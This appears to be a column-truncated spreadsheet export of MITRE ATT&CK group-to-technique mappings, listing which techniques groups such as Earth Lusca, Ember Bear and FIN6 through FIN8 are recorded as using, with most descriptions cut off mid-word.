G1011 EXOTIC LIL intrusion- group uses T1597 Search Clo attack-pat technique [EXOTIC LI
G1011 EXOTIC LIL intrusion- group uses T1594 Search Vic attack-pat technique [EXOTIC LIL
G1011 EXOTIC LIL intrusion- group uses T1593.001Social Medattack-pat technique [EXOTIC LIL
G1011 EXOTIC LIL intrusion- group uses T1585.001Social Medattack-pat technique [EXOTIC LIL
G1011 EXOTIC LIL intrusion- group uses T1566.001Spearphishattack-pat technique [EXOTIC LI
G1011 EXOTIC LIL intrusion- group uses T1566.002Spearphishattack-pat technique [EXOTIC LIL
G1011 EXOTIC LIL intrusion- group uses T1566.003Spearphishiattack-pat technique [EXOTIC LIL
G1011 EXOTIC LIL intrusion- group uses T1608.001Upload Maattack-pat technique [EXOTIC LIL
G1011 EXOTIC LIL intrusion- group uses T1102 Web Servicattack-pat technique [EXOTIC LIL
G1006 Earth Lusc intrusion- group uses T1560.001Archive viaattack-pat technique [Earth Lusc
G1006 Earth Lusc intrusion- group uses T1548.002Bypass Useattack-pat technique [Earth Lusc
G1006 Earth Lusc intrusion- group uses T1003.006DCSync attack-pat technique [Earth Lus
G1006 Earth Lusc intrusion- group uses T1574.002DLL Side-L attack-pat technique [Earth Lus
G1006 Earth Lusc intrusion- group uses T1140 Deobfuscatattack-pat technique [Earth Lusc
G1006 Earth Lusc intrusion- group uses T1482 Domain Truattack-pat technique [Earth Lusc
G1006 Earth Lusc intrusion- group uses T1583.001Domains attack-pat technique [Earth Lusc
G1006 Earth Lusc intrusion- group uses T1189 Drive-by C attack-pat technique [Earth Lusc
G1006 Earth Lusc intrusion- group uses T1567.002Exfiltratio attack-pat technique [Earth Lus
G1006 Earth Lusc intrusion- group uses T1190 Exploit Pubattack-pat technique [Earth Lusc
G1006 Earth Lusc intrusion- group uses T1210 Exploitatioattack-pat technique [Earth Lusc
G1006 Earth Lusc intrusion- group uses T1059.007JavaScript attack-pat technique [Earth Lusc
G1006 Earth Lusc intrusion- group uses T1003.001LSASS Memattack-pat technique [Earth Lus
G1006 Earth Lusc intrusion- group uses T1204.002Malicious Fattack-pat technique [Earth Lusc
G1006 Earth Lusc intrusion- group uses T1204.001Malicious Lattack-pat technique [Earth Lusc
G1006 Earth Lusc intrusion- group uses T1588.001Malware attack-pat technique [Earth Lusc
G1006 Earth Lusc intrusion- group uses T1036.005Match Legiattack-pat technique [Earth Lus
G1006 Earth Lusc intrusion- group uses T1112 Modify Regattack-pat technique [Earth Lus
G1006 Earth Lusc intrusion- group uses T1218.005Mshta attack-pat technique [Earth Lusc
G1006 Earth Lusc intrusion- group uses T1027 Obfuscatedattack-pat technique [Earth Lusc
G1006 Earth Lusc intrusion- group uses T1059.001PowerShellattack-pat technique [Earth Lus
G1006 Earth Lusc intrusion- group uses T1547.012Print Proceattack-pat technique [Earth Lus
G1006 Earth Lusc intrusion- group uses T1057 Process Di attack-pat technique [Earth Lusc
G1006 Earth Lusc intrusion- group uses T1090 Proxy attack-pat technique [Earth Lusc
G1006 Earth Lusc intrusion- group uses T1059.006Python attack-pat technique [Earth
[Earth Lusc
Lusca](https://attack.m
G1006 Earth Lusc intrusion- group uses T1018 Remote Sysattack-pat technique property * | findstr “Address
G1006 Earth Lusc intrusion- group uses T1098.004SSH Authorattack-pat technique [Earth Lusc
G1006 Earth Lusc intrusion- group uses T1053 Scheduled attack-pat technique [Earth Lus
G1006 Earth Lusc intrusion- group uses T1583.004Server attack-pat technique [Earth Lusc
G1006 Earth Lusc intrusion- group uses T1584.004Server attack-pat technique [Earth Lusc
G1006 Earth Lusc intrusion- group uses T1566.002Spearphishattack-pat technique [Earth Lusc
G1006 Earth Lusc intrusion- group uses T1027.003Steganogr attack-pat technique [Earth Lusc
G1006 Earth Lusc intrusion- group uses T1016 System Netattack-pat technique [Earth
[Earth Lus
Lusca](https://attack.m
G1006 Earth Lusc intrusion- group uses T1049 System Netattack-pat technique (Event ID 1024) to obtain net
G1006 Earth Lusc intrusion- group uses T1033 System Own attack-pat technique [Earth Lus
G1006 Earth Lusc intrusion- group uses T1007 System Serattack-pat technique [Earth Lusc
G1006 Earth Lusc intrusion- group uses T1588.002Tool attack-pat technique [Earth Lusc
G1006 Earth Lusc intrusion- group uses T1608.001Upload Maattack-pat technique [Earth Lus
G1006 Earth Lusc intrusion- group uses T1059.005Visual Basiattack-pat technique [Earth Lusc
G1006 Earth Lusc intrusion- group uses T1595.002Vulnerabiliattack-pat technique [Earth Lusc
G1006 Earth Lusc intrusion- group uses T1583.006Web Servicattack-pat technique [Earth Lusc
G1006 Earth Lusc intrusion- group uses T1584.006Web Servicattack-pat technique [Earth Lus
G1006 Earth Lusc intrusion- group uses T1047 Windows M attack-pat technique [Earth
[Earth Lus
Lusca](https://attack.m
G1006 Earth Lusc intrusion- group uses T1543.003Windows Se attack-pat technique start SysUpdate</code> for p
G0066 Elderwoodintrusion- group uses T1189 Drive-by C attack-pat technique [Elderwood]
G0066 Elderwoodintrusion- group uses T1027.013Encrypted/attack-pat technique [Elderwood
G0066 Elderwoodintrusion- group uses T1203 Exploitatioattack-pat technique [Elderwood]
G0066 Elderwoodintrusion- group uses T1105 Ingress Tooattack-pat technique The Ritsol
G0066 Elderwoodintrusion- group uses T1204.002Malicious Fattack-pat technique [Elderwood
G0066 Elderwoodintrusion- group uses T1204.001Malicious Lattack-pat technique [Elderwood]
G0066 Elderwoodintrusion- group uses T1027.002Software Pattack-pat technique [Elderwood
G0066 Elderwoodintrusion- group uses T1566.001Spearphishattack-pat technique [Elderwood
G0066 Elderwoodintrusion- group uses T1566.002Spearphishattack-pat technique [Elderwood
G1003 Ember Beaintrusion- group uses T1583 Acquire Infattack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1560 Archive Coattack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1119 Automatedattack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1110 Brute Forc attack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1552.001Credentialsattack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1071.004DNS attack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1005 Data from attack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1078.001Default Ac attack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1562.001Disable or attack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1561.002Disk Struc attack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1114 Email Colleattack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1585 Establish attack-pat technique [Ember Bea
G1003 Ember Beaintrusion- group uses T1567.002Exfiltratio attack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1190 Exploit Pubattack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1203 Exploitatioattack-pat technique [Ember Bea
G1003 Ember Beaintrusion- group uses T1210 Exploitatioattack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1588.005Exploits attack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1491.002External D attack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1133 External R attack-pat technique [Ember Bea
G1003 Ember Beaintrusion- group uses T1070.004File Deleti attack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1003.004LSA Secret attack-pat technique [Ember Bea
G1003 Ember Beaintrusion- group uses T1003.001LSASS Memattack-pat technique [Ember Bea
G1003 Ember Beaintrusion- group uses T1570 Lateral Tooattack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1654 Log Enumerattack-pat technique [Ember Bea
G1003 Ember Beaintrusion- group uses T1588.001Malware attack-pat technique [Ember Bea
G1003 Ember Beaintrusion- group uses T1036 Masqueradattack-pat technique [Ember Bea
G1003 Ember Beaintrusion- group uses T1036.005Match Legiattack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1112 Modify Regattack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1090.003Multi-hop attack-pat technique [Ember Bea
G1003 Ember Beaintrusion- group uses T1046 Network Seattack-pat technique [Ember Bea
G1003 Ember Beaintrusion- group uses T1095 Non-Applicattack-pat technique [Ember Bea
G1003 Ember Beaintrusion- group uses T1571 Non-Standaattack-pat technique [Ember Bea
G1003 Ember Beaintrusion- group uses T1003 OS Credentattack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1550.002Pass the H attack-pat technique [Ember Bea
G1003 Ember Beaintrusion- group uses T1110.003Password Sattack-pat technique [Ember Bea
G1003 Ember Beaintrusion- group uses T1059.001PowerShellattack-pat technique [Ember Bea
G1003 Ember Beaintrusion- group uses T1572 Protocol T attack-pat technique [Ember Bea
G1003 Ember Beaintrusion- group uses T1021 Remote Serattack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1018 Remote Sysattack-pat technique [Ember Bea
G1003 Ember Beaintrusion- group uses T1595.001Scanning IPattack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1053.005Scheduled attack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1003.002Security A attack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1195 Supply Chaattack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1125 Video Captattack-pat technique [Ember Bea
G1003 Ember Beaintrusion- group uses T1583.003Virtual Pri attack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1595.002Vulnerabiliattack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1505.003Web Shell attack-pat technique [Ember Bear
G1003 Ember Beaintrusion- group uses T1047 Windows M attack-pat technique [Ember Bea
G0020 Equation intrusion- group uses T1542.002Componentattack-pat technique [Equation](
G0020 Equation intrusion- group uses T1480.001Environmen attack-pat technique [Equation](
G0020 Equation intrusion- group uses T1564.005Hidden Fil attack-pat technique [Equation](
G0020 Equation intrusion- group uses T1120 Peripheral attack-pat technique [Equation](
G0120 Evilnum intrusion- group uses T1548.002Bypass Useattack-pat technique [Evilnum](
G0120 Evilnum intrusion- group uses T1555 Credential attack-pat technique [Evilnum](h
G0120 Evilnum intrusion- group uses T1574.001DLL Searchattack-pat technique [Evilnum](h
G0120 Evilnum intrusion- group uses T1070.004File Deleti attack-pat technique [Evilnum](h
G0120 Evilnum intrusion- group uses T1105 Ingress Tooattack-pat technique [Evilnum](h
G0120 Evilnum intrusion- group uses T1059.007JavaScript attack-pat technique [Evilnum](h
G0120 Evilnum intrusion- group uses T1204.001Malicious Lattack-pat technique [Evilnum](h
G0120 Evilnum intrusion- group uses T1219 Remote Accattack-pat technique [EVILNUM](
G0120 Evilnum intrusion- group uses T1566.002Spearphishattack-pat technique [Evilnum](h
G0120 Evilnum intrusion- group uses T1539 Steal Web attack-pat technique [Evilnum](h
G0120 Evilnum intrusion- group uses T1497.001System Cheattack-pat technique [Evilnum](
G0051 FIN10 intrusion- group uses T1070.004File Deleti attack-pat technique [FIN10](htt
G0051 FIN10 intrusion- group uses T1570 Lateral Tooattack-pat technique [FIN10](htt
G0051 FIN10 intrusion- group uses T1078.003Local Acco attack-pat technique [FIN10](htt
G0051 FIN10 intrusion- group uses T1059.001PowerShellattack-pat technique [FIN10](htt
G0051 FIN10 intrusion- group uses T1547.001Registry Ruattack-pat technique [FIN10](htt
G0051 FIN10 intrusion- group uses T1021.001Remote Des attack-pat technique [FIN10](htt
G0051 FIN10 intrusion- group uses T1053.005Scheduled attack-pat technique [FIN10](htt
G0051 FIN10 intrusion- group uses T1033 System Own attack-pat technique [FIN10](ht
G0051 FIN10 intrusion- group uses T1588.002Tool attack-pat technique [FIN10](htt
G0051 FIN10 intrusion- group uses T1078 Valid Acco attack-pat technique [FIN10](htt
G0051 FIN10 intrusion- group uses T1059.003Windows Cattack-pat technique [FIN10](htt
G1016 FIN13 intrusion- group uses T1087 Account Diattack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1098.007Additional attack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1560.001Archive viaattack-pat technique [FIN13](ht
G1016 FIN13 intrusion- group uses T1552.001Credentialsattack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1574.002DLL Side-L attack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1565 Data Manipattack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1005 Data from attack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1078.001Default Ac attack-pat technique [FIN13](ht
G1016 FIN13 intrusion- group uses T1140 Deobfuscatattack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1087.002Domain Acattack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1190 Exploit Pubattack-pat technique [FIN13](ht
G1016 FIN13 intrusion- group uses T1133 External R attack-pat technique [FIN13](ht
G1016 FIN13 intrusion- group uses T1083 File and Di attack-pat technique [FIN13](ht
G1016 FIN13 intrusion- group uses T1657 Financial Tattack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1589 Gather Victattack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1564.001Hidden Fileattack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1105 Ingress Tooattack-pat technique [FIN13](ht
G1016 FIN13 intrusion- group uses T1090.001Internal Prattack-pat technique [FIN13](ht
G1016 FIN13 intrusion- group uses T1016.001Internet C attack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1056.001Keyloggingattack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1003.001LSASS Memattack-pat technique [FIN13](ht
G1016 FIN13 intrusion- group uses T1136.001Local Acco attack-pat technique [FIN13](ht
G1016 FIN13 intrusion- group uses T1074.001Local Data attack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1134.003Make and attack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1587.001Malware attack-pat technique [FIN13](ht
G1016 FIN13 intrusion- group uses T1036.004Masquerade attack-pat technique [FIN13](ht
G1016 FIN13 intrusion- group uses T1036 Masqueradattack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1036.005Match Legiattack-pat technique [FIN13](ht
G1016 FIN13 intrusion- group uses T1556 Modify Autattack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1003.003NTDS attack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1046 Network Seattack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1135 Network Shattack-pat technique [FIN13](ht
G1016 FIN13 intrusion- group uses T1590.004Network T attack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1550.002Pass the H attack-pat technique [FIN13](ht
G1016 FIN13 intrusion- group uses T1069 Permissionattack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1059.001PowerShellattack-pat technique [FIN13](ht
G1016 FIN13 intrusion- group uses T1572 Protocol T attack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1547.001Registry Ruattack-pat technique [FIN13](ht
G1016 FIN13 intrusion- group uses T1021.001Remote Des attack-pat technique [FIN13](ht
G1016 FIN13 intrusion- group uses T1021.002SMB/Windo attack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1021.004SSH attack-pat technique [FIN13](ht
G1016 FIN13 intrusion- group uses T1053.005Scheduled attack-pat technique [FIN13](ht
G1016 FIN13 intrusion- group uses T1003.002Security A attack-pat technique [FIN13](ht
G1016 FIN13 intrusion- group uses T1082 System Inf attack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1016 System Netattack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1049 System Netattack-pat technique [FIN13](ht
G1016 FIN13 intrusion- group uses T1588.002Tool attack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1059.005Visual Basiattack-pat technique [FIN13](ht
G1016 FIN13 intrusion- group uses T1071.001Web Protocattack-pat technique [FIN13](htt
G1016 FIN13 intrusion- group uses T1505.003Web Shell attack-pat technique [FIN13](ht
G1016 FIN13 intrusion- group uses T1059.003Windows Cattack-pat technique [FIN13](ht
G1016 FIN13 intrusion- group uses T1047 Windows M attack-pat technique [FIN13](ht
G1016 FIN13 intrusion- group uses T1021.006Windows Rattack-pat technique [FIN13](htt
G0085 FIN4 intrusion- group uses T1564.008Email Hidinattack-pat technique [FIN4](http
G0085 FIN4 intrusion- group uses T1056.002GUI Input attack-pat technique [FIN4](http
G0085 FIN4 intrusion- group uses T1056.001Keyloggingattack-pat technique [FIN4](http
G0085 FIN4 intrusion- group uses T1204.002Malicious Fattack-pat technique [FIN4](http
G0085 FIN4 intrusion- group uses T1204.001Malicious Lattack-pat technique [FIN4](http
G0085 FIN4 intrusion- group uses T1090.003Multi-hop attack-pat technique [FIN4](http
G0085 FIN4 intrusion- group uses T1114.002Remote Ema attack-pat technique [FIN4](http
G0085 FIN4 intrusion- group uses T1566.001Spearphishattack-pat technique [FIN4](htt
G0085 FIN4 intrusion- group uses T1566.002Spearphishattack-pat technique [FIN4](http
G0085 FIN4 intrusion- group uses T1078 Valid Acco attack-pat technique [FIN4](http
G0085 FIN4 intrusion- group uses T1059.005Visual Basiattack-pat technique [FIN4](http
G0085 FIN4 intrusion- group uses T1071.001Web Protocattack-pat technique [FIN4](http
G0053 FIN5 intrusion- group uses T1119 Automatedattack-pat technique [FIN5](http
G0053 FIN5 intrusion- group uses T1110 Brute Forc attack-pat technique [FIN5](http
G0053 FIN5 intrusion- group uses T1070.001Clear Windattack-pat technique [FIN5](http
G0053 FIN5 intrusion- group uses T1059 Command attack-pat
an technique [FIN5](http
G0053 FIN5 intrusion- group uses T1090.002External Prattack-pat technique [FIN5](http
G0053 FIN5 intrusion- group uses T1133 External R attack-pat technique [FIN5](http
G0053 FIN5 intrusion- group uses T1070.004File Deleti attack-pat technique [FIN5](htt
G0053 FIN5 intrusion- group uses T1074.001Local Data attack-pat technique [FIN5](http
G0053 FIN5 intrusion- group uses T1018 Remote Sysattack-pat technique [FIN5](http
G0053 FIN5 intrusion- group uses T1588.002Tool attack-pat technique [FIN5](http
G0053 FIN5 intrusion- group uses T1078 Valid Acco attack-pat technique [FIN5](http
G0037 FIN6 intrusion- group uses T1134 Access Tokattack-pat technique [FIN6](http
G0037 FIN6 intrusion- group uses T1560 Archive Coattack-pat technique Following d
G0037 FIN6 intrusion- group uses T1560.003Archive vi attack-pat technique [FIN6](http
G0037 FIN6 intrusion- group uses T1573.002Asymmetricattack-pat technique [FIN6](http
G0037 FIN6 intrusion- group uses T1119 Automatedattack-pat technique [FIN6](http
G0037 FIN6 intrusion- group uses T1553.002Code Signi attack-pat technique [FIN6](http
G0037 FIN6 intrusion- group uses T1027.010Command aOttack-pat technique [FIN6](htt
G0037 FIN6 intrusion- group uses T1059 Command attack-pat
an technique [FIN6](http
G0037 FIN6 intrusion- group uses T1555 Credential attack-pat technique [FIN6](http
G0037 FIN6 intrusion- group uses T1555.003Credential attack-pat technique [FIN6](http
G0037 FIN6 intrusion- group uses T1213 Data from attack-pat technique [FIN6](http
G0037 FIN6 intrusion- group uses T1005 Data from attack-pat technique [FIN6](htt
G0037 FIN6 intrusion- group uses T1562.001Disable or attack-pat technique [FIN6](http
G0037 FIN6 intrusion- group uses T1087.002Domain Acattack-pat technique [FIN6](http
G0037 FIN6 intrusion- group uses T1048.003Exfiltrati attack-pat technique [FIN6](htt
G0037 FIN6 intrusion- group uses T1068 Exploitatioattack-pat technique [FIN6](http
G0037 FIN6 intrusion- group uses T1070.004File Deleti attack-pat technique [FIN6](http
G0037 FIN6 intrusion- group uses T1059.007JavaScript attack-pat technique [FIN6](http
[FIN6](https://attack.mitre.o
G0037 FIN6 intrusion- group uses T1003.001LSASS Memattack-pat technique
G0037 FIN6 intrusion- group uses T1204.002Malicious Fattack-pat technique [FIN6](http
G0037 FIN6 intrusion- group uses T1036.004Masquerade attack-pat technique [FIN6](http
G0037 FIN6 intrusion- group uses T1003.003NTDS attack-pat technique [FIN6](http
G0037 FIN6 intrusion- group uses T1046 Network Seattack-pat technique [FIN6](http
G0037 FIN6 intrusion- group uses T1095 Non-Applicattack-pat technique [FIN6](htt
G0037 FIN6 intrusion- group uses T1110.002Password Cattack-pat technique [FIN6](http
G0037 FIN6 intrusion- group uses T1059.001PowerShellattack-pat technique [FIN6](htt
G0037 FIN6 intrusion- group uses T1572 Protocol T attack-pat technique [FIN6](http
G0037 FIN6 intrusion- group uses T1547.001Registry Ruattack-pat technique [FIN6](http
G0037 FIN6 intrusion- group uses T1074.002Remote Datattack-pat technique [FIN6](http
G0037 FIN6 intrusion- group uses T1021.001Remote Des attack-pat technique [FIN6](http
G0037 FIN6 intrusion- group uses T1018 Remote Sysattack-pat technique [FIN6](http
G0037 FIN6 intrusion- group uses T1053.005Scheduled attack-pat technique [FIN6](htt
G0037 FIN6 intrusion- group uses T1569.002Service Ex attack-pat technique [FIN6](htt
G0037 FIN6 intrusion- group uses T1566.001Spearphishattack-pat technique [FIN6](http
G0037 FIN6 intrusion- group uses T1566.003Spearphishiattack-pat technique [FIN6](http
G0037 FIN6 intrusion- group uses T1588.002Tool attack-pat technique [FIN6](http
G0037 FIN6 intrusion- group uses T1078 Valid Acco attack-pat technique [FIN6](https://attack.mitre.o
To move lat
G0037 FIN6 intrusion- group uses T1102 Web Servicattack-pat technique
G0037 FIN6 intrusion- group uses T1059.003Windows Cattack-pat technique [FIN6](http
G0037 FIN6 intrusion- group uses T1047 Windows M attack-pat technique [FIN6](http
G0046 FIN7 intrusion- group uses T1546.011Applicatio attack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1102.002Bidirectio attack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1027.001Binary Padattack-pat technique [FIN7](htt
G0046 FIN7 intrusion- group uses T1553.002Code Signi attack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1027.010Command aOttack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1059 Command attack-pat
an technique [FIN7](http
G0046 FIN7 intrusion- group uses T1195.002Compromise attack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1071.004DNS attack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1486 Data Encryattack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1005 Data from attack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1069.002Domain Grattack-pat technique [FIN7](htt
G0046 FIN7 intrusion- group uses T1583.001Domains attack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1608.004Drive-by T attack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1559.002Dynamic Daattack-pat technique [FIN7](htt
G0046 FIN7 intrusion- group uses T1567.002Exfiltratio attack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1190 Exploit Pubattack-pat technique [FIN7](htt
G0046 FIN7 intrusion- group uses T1210 Exploitatioattack-pat technique [FIN7](htt
G0046 FIN7 intrusion- group uses T1008 Fallback C attack-pat technique [FIN7](htt
G0046 FIN7 intrusion- group uses T1105 Ingress Tooattack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1059.007JavaScript attack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1558.003Kerberoastattack-pat technique [FIN7](htt
G0046 FIN7 intrusion- group uses T1078.003Local Acco attack-pat technique [FIN7](htt
G0046 FIN7 intrusion- group uses T1204.002Malicious Fattack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1204.001Malicious Lattack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1587.001Malware attack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1036.004Masquerade attack-pat technique [FIN7](htt
G0046 FIN7 intrusion- group uses T1036.005Match Legiattack-pat technique [FIN7](htt
G0046 FIN7 intrusion- group uses T1218.005Mshta attack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1571 Non-Standaattack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1059.001PowerShellattack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1547.001Registry Ruattack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1219 Remote Accattack-pat technique [FIN7](htt
[FIN7](https://attack.mitre.o
G0046 FIN7 intrusion- group uses T1021.001Remote Des attack-pat technique
G0046 FIN7 intrusion- group uses T1091 Replicatio attack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1218.011Rundll32 attack-pat technique [FIN7](htt
G0046 FIN7 intrusion- group uses T1021.004SSH attack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1053.005Scheduled attack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1113 Screen Capattack-pat technique [FIN7](htt
G0046 FIN7 intrusion- group uses T1566.001Spearphishattack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1566.002Spearphishattack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1033 System Own attack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1588.002Tool attack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1608.001Upload Maattack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1497.002User Activiattack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1021.005VNC attack-pat technique [FIN7](htt
G0046 FIN7 intrusion- group uses T1078 Valid Acco attack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1125 Video Captattack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1059.005Visual Basiattack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1583.006Web Servicattack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1059.003Windows Cattack-pat technique [FIN7](htt
G0046 FIN7 intrusion- group uses T1047 Windows M attack-pat technique [FIN7](http
G0046 FIN7 intrusion- group uses T1543.003Windows Se attack-pat technique [FIN7](http
G0061 FIN8 intrusion- group uses T1560.001Archive viaattack-pat technique [FIN8](http
G0061 FIN8 intrusion- group uses T1573.002Asymmetricattack-pat technique [FIN8](http
G0061 FIN8 intrusion- group uses T1055.004Asynchronoattack-pat technique [FIN8](http
G0061 FIN8 intrusion- group uses T1070.001Clear Windattack-pat technique [FIN8](http
G0061 FIN8 intrusion- group uses T1588.003Code Signinattack-pat technique [FIN8](http
G0061 FIN8 intrusion- group uses T1027.010Command aOttack-pat technique [FIN8](http
G0061 FIN8 intrusion- group uses T1486 Data Encryattack-pat technique [FIN8](htt
G0061 FIN8 intrusion- group uses T1482 Domain Truattack-pat technique [FIN8](http
G0061 FIN8 intrusion- group uses T1048.003Exfiltrati attack-pat technique [FIN8](http
G0061 FIN8 intrusion- group uses T1068 Exploitatioattack-pat technique [FIN8](http
G0061 FIN8 intrusion- group uses T1070.004File Deleti attack-pat technique [FIN8](http
G0061 FIN8 intrusion- group uses T1105 Ingress Tooattack-pat technique [FIN8](htt
G0061 FIN8 intrusion- group uses T1016.001Internet C attack-pat technique [FIN8](http
G0061 FIN8 intrusion- group uses T1003.001LSASS Memattack-pat technique [FIN8](htt
G0061 FIN8 intrusion- group uses T1204.002Malicious Fattack-pat technique [FIN8](http
G0061 FIN8 intrusion- group uses T1204.001Malicious Lattack-pat technique [FIN8](http
G0061 FIN8 intrusion- group uses T1112 Modify Regattack-pat technique [FIN8](http
G0061 FIN8 intrusion- group uses T1059.001PowerShellattack-pat technique [FIN8](http
G0061 FIN8 intrusion- group uses T1074.002Remote Datattack-pat technique [FIN8](http
G0061 FIN8 intrusion- group uses T1021.001Remote Des attack-pat technique [FIN8](htt
G0061 FIN8 intrusion- group uses T1018 Remote Sysattack-pat technique [FIN8](http
G0061 FIN8 intrusion- group uses T1021.002SMB/Windo attack-pat technique [FIN8](http
G0061 FIN8 intrusion- group uses T1053.005Scheduled attack-pat technique [FIN8](htt
G0061 FIN8 intrusion- group uses T1518.001Security S attack-pat technique [FIN8](http
G0061 FIN8 intrusion- group uses T1566.001Spearphishattack-pat technique [FIN8](htt
G0061 FIN8 intrusion- group uses T1566.002Spearphishattack-pat technique [FIN8](htt
G0061 FIN8 intrusion- group uses T1082 System Inf attack-pat technique [FIN8](http
G0061 FIN8 intrusion- group uses T1033 System Own attack-pat technique [FIN8](http
G0061 FIN8 intrusion- group uses T1134.001Token Impeattack-pat technique [FIN8](http
G0061 FIN8 intrusion- group uses T1588.002Tool attack-pat technique [FIN8](http
G0061 FIN8 intrusion- group uses T1078 Valid Acco attack-pat technique [FIN8](htt
G0061 FIN8 intrusion- group uses T1071.001Web Protocattack-pat technique [FIN8](htt
G0061 FIN8 intrusion- group uses T1102 Web Servicattack-pat technique [FIN8](http
G0061 FIN8 intrusion- group uses T1059.003Windows Cattack-pat technique [FIN8](http
G0061 FIN8 intrusion- group uses T1047 Windows M attack-pat technique [FIN8](http
G0061 FIN8 intrusion- group uses T1546.003Windows Ma attack-pat technique [FIN8](http
G0137 Ferocious Kintrusion- group uses T1583.001Domains attack-pat technique [Ferocious
G0137 Ferocious Kintrusion- group uses T1204.002Malicious Fattack-pat technique [Ferocious
G0137 Ferocious Kintrusion- group uses T1036.005Match Legiattack-pat technique [Ferocious
G0137 Ferocious Kintrusion- group uses T1036.002Right-to-Leattack-pat technique [Ferocious
G0137 Ferocious Kintrusion- group uses T1566.001Spearphishattack-pat technique [Ferocious
G0137 Ferocious Kintrusion- group uses T1588.002Tool attack-pat technique [Ferocious
G0117 Fox Kitten intrusion- group uses T1546.008Accessibili attack-pat technique [Fox Kitte
